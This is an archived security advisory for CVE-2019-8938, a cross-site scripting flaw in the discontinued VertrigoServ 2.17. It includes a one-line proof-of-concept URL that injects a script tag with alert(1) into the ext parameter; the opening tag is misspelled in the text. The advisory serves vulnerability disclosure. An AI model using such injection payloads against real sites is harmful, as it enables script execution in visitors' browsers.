VertrigoServ 2.17 Cross Site Scripting

VertrigoServ 2.17 Cross Site Scripting: Posted Feb 20, 2019; Authored by Rafael Pedrero; VertrigoServ version 2.17 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2019-8938; SHA-256 | fc6f8c9a0cd29c70aacb74b280bb7d4e1e9db89ad27ed73df5865fab89fb5f5e; Download | Favorite | View

VertrigoServ 2.17 Cross Site Scripting

<!--
# Exploit Title: Cross Site Scripting in VertrigoServ 2.17
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://vertrigo.sf.net
# Software Link: http://vertrigo.sf.net
# Version: VertrigoServ 2.17
# Tested on: All
# CVE : CVE-2019-8938
# Category: webapps

1. Description

VertrigoServ 2.17 allows XSS via the /inc/extensions.php ext parameter.
NOTE: This product is discontinued.


2. Proof of Concept

http://127.0.0.1/inc/extensions.php?ext=<scrript>alert(1)</script>

3. Solution:

The product is discontinued. Update last version

-->

Top Authors In Last 30 Days

Red Hat 326 files
Ubuntu 72 files
Debian 21 files
Apple 14 files
LiquidWorm 13 files
Gentoo 8 files
Google Security Research 4 files
Andrey Stoykov 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

VertrigoServ 2.17 Cross Site Scripting

VertrigoServ 2.17 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

VertrigoServ 2.17 Cross Site Scripting

Share This

VertrigoServ 2.17 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems